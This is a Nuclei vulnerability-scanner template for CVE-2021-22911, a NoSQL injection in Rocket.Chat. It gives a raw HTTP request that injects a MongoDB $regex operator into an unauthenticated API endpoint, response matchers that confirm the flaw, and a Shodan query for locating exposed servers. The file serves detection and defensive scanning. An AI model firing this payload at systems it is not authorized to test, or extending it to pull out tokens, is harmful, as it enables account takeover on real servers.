nuclei-templates/cves/2021/CVE-2021-22911.yaml

50 lines
1.6 KiB
YAML

id: CVE-2021-22911
info:
name: RocketChat - NoSQL injection
author: tess,sullo
severity: critical
description: Rocket.Chat server versions 3.11, 3.12 and 3.1 allow unauthenticated access to an API endpoint which leads to NoSQL injection in the database.
reference:
- http://packetstormsecurity.com/files/162997/Rocket.Chat-3.12.1-NoSQL-Injection-Code-Execution.html
- https://github.com/vulhub/vulhub/tree/master/rocketchat/CVE-2021-22911
- https://hackerone.com/reports/1130721
- https://nvd.nist.gov/vuln/detail/CVE-2021-22911
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22911
- https://blog.sonarsource.com/nosql-injections-in-rocket-chat
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-22911
cwe-id: CWE-89
metadata:
shodan-query: http.title:"Rocket.Chat"
verified: "true"
tags: rocketchat,nosqli,packetstorm,vulhub,hackerone,cve,cve2021
requests:
- raw:
- |-
POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"message": "{\"msg\":\"method\", \"method\": \"getPasswordPolicy\", \"params\": [{\"token\": {\"$regex\": \"^{{randstr}}\"}}] }"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '[error-invalid-user]'
- '"success":true'
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 200